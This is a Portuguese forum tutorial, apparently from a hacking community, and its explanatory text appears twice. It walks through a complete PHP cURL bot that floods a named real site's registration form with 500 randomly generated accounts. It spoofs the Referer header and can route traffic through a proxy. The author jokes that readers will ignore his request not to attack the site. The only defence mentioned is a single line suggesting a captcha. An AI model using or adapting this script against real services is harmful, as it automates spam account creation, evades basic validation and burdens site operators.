Boas. Aí vai um tutorial inútil por um lado, mas que também pode te ensinar sobre Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
O cURL é uma ferramenta que funciona via linha de comando e serve para transmitir dados por diversos protocolos, suportando, por exemplo, autenticação, método POST e GET e até mesmo SSL (HTTPS/criptografado).
E, como sou um bebezinho malvado (como disse Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - não me pergunte de onde veio essa expressão), vou ensinar agora como criar bots de flood em formulários.
Para isso, vamos usar o PHP CURL, a biblioteca do PHP que dá suporte ao libcurl.
Nosso alvo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (nada contra... foi escolhido à dedo)
Precisamos, antes de tudo, de um servidor web com PHP instalado e o módulo CURL ativo. Pesquise como fazer isso em seu servidor e sistema operacional. Mas geralmente é simples. Servidores como WampServer ativam módulos pelo próprio Tray Icon. Em *nix, usamos o comando "a2enmod".
Vamos então obter os nomes dos campos no formulário. No site, procure a página de registro e dê um Ctrl + U (ver código-fonte). Procure pelo código HTML do formulário de registro. O que nos interessa é o "action" do "form" e os "name"s de cada "input" ou "textarea".
Vamos iniciar o código setando o tempo limite de execução (geralmente 30 segundos) para infinito:
Primeiramente, vamos criar a função que nos retorna letras randômicas (aleatórias), de 4 a 6 letras.. Pode ser feita de duas formas:
Ok, vamos continuar. Agora, vamos escolher, em uma variável, a quantidade de contas que devemos criar. Então é simples, criamos o loop que se repetirá nessa quantidade de vezes.
Agora vamos começar a usar o cURL.
Vamos iniciá-lo, setando a página do formulário:
Dizemos ao cURL para retornar a transferência, ao invés de printá-lo na tela diretamente:
Agora, entram os dados do formulário que obtivemos anteriormente. Precisamos separar a senha em uma variável, pois teremos que utilizá-la duas vezes: uma para o campo "Senha" e o outro para a confirmação da senha.
Mas podemos ter problemas se o sistema estiver validando pelo HTTP Header 'referer'. Portanto:
Opcionalmente, também podemos usar proxy:
Agora só precisamos executar e fechar o cURL. Fechamos também o loop.
Execute. Enquanto a página estiver carregando, contas e mais contas serão criadas. Para interromper o processo, basta cancelar o carregamento da página.
O site mostra, na página inicial, a última conta criada. Tente apertar F5 por várias vezes, para ver como está a criação de contas.
Como me previno?
O modo mais fácil e seguro para este tipo de coisa é usar um bom Captcha. Mas um bom mesmo! Sugestão: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Agora, você deve estar se perguntando: por que o 0KaL postou uma coisa inútil dessas? Virou a noite bebendo?
Olhe para cima e veja o conteúdo de PHP e, principalmente, cURL envolvido no processo. Legal, não?
Até mais!
O cURL é uma ferramenta que funciona via linha de comando e serve para transmitir dados por diversos protocolos, suportando, por exemplo, autenticação, método POST e GET e até mesmo SSL (HTTPS/criptografado).
E, como sou um bebezinho malvado (como disse Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - não me pergunte de onde veio essa expressão), vou ensinar agora como criar bots de flood em formulários.
Para isso, vamos usar o PHP CURL, a biblioteca do PHP que dá suporte ao libcurl.
Nosso alvo: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (nada contra... foi escolhido à dedo)
Aviso: o site acima foi utilizado apenas como exemplo de formulário de registro. Favor não atacá-lo (embora eu saiba que ninguém vai respeitar isso).
Nossa intenção: criar diversos usuários com nomes randômicos.Precisamos, antes de tudo, de um servidor web com PHP instalado e o módulo CURL ativo. Pesquise como fazer isso em seu servidor e sistema operacional. Mas geralmente é simples. Servidores como WampServer ativam módulos pelo próprio Tray Icon. Em *nix, usamos o comando "a2enmod".
Vamos então obter os nomes dos campos no formulário. No site, procure a página de registro e dê um Ctrl + U (ver código-fonte). Procure pelo código HTML do formulário de registro. O que nos interessa é o "action" do "form" e os "name"s de cada "input" ou "textarea".
Vamos iniciar o código setando o tempo limite de execução (geralmente 30 segundos) para infinito:
Código PHP:
<?php
set_time_limit(0);
Código PHP:
function getrand() {
$lets = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPRQSTUVWXYZ0123456789"; // caracteres possíveis
$lets = str_shuffle($lets); // mistura as letras
$lets = substr($lets, 0, rand(4, 6)); // corta apenas 4 a 6 primeiros
return $lets;
}
Código PHP:
function getrand($datasize) {
$j = rand(4,6); // gera uma quantidade de 4 a 6
for($i = 0; $i <= $j; $i++) { // loop que se repete $j vezes
$data .= chr(rand(48, 122)); // isso retorna um caractere alfanumérico randomico
}
return $data;
}
Código PHP:
$contas = 500; // 500 contas
for($i = 0; $i <= $contas; $i++) {
Vamos iniciá-lo, setando a página do formulário:
Código PHP:
$curl = curl_init('http://skinawap.com.br/register.php');
Código PHP:
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
Código PHP:
$pwd = getrand();
$dados = array(
'uid'=>getrand(),
'pwd'=>$pwd,
'cpw'=>$pwd,
'bdyy'=>rand(1950,1990),
'bdym'=>rand(1,12),
'bdyd'=>rand(1,28),
'usx'=>'M',
'ulc'=>getrand()
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $dados);
Código PHP:
curl_setopt($curl, CURLOPT_REFERER, 'http://skinawap.com.br/register.php'); // setamos a referencia como a página do formulário. Neste caso, é a mesma para onde irão os dados via POST
Código PHP:
curl_setopt($curl, CURLOPT_PROXY, "ip:porta");
Código PHP:
$resultado = curl_exec($curl);
curl_close($curl);
}
O site mostra, na página inicial, a última conta criada. Tente apertar F5 por várias vezes, para ver como está a criação de contas.
Como me previno?
O modo mais fácil e seguro para este tipo de coisa é usar um bom Captcha. Mas um bom mesmo! Sugestão: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Agora, você deve estar se perguntando: por que o 0KaL postou uma coisa inútil dessas? Virou a noite bebendo?
Olhe para cima e veja o conteúdo de PHP e, principalmente, cURL envolvido no processo. Legal, não?
Até mais!
Comment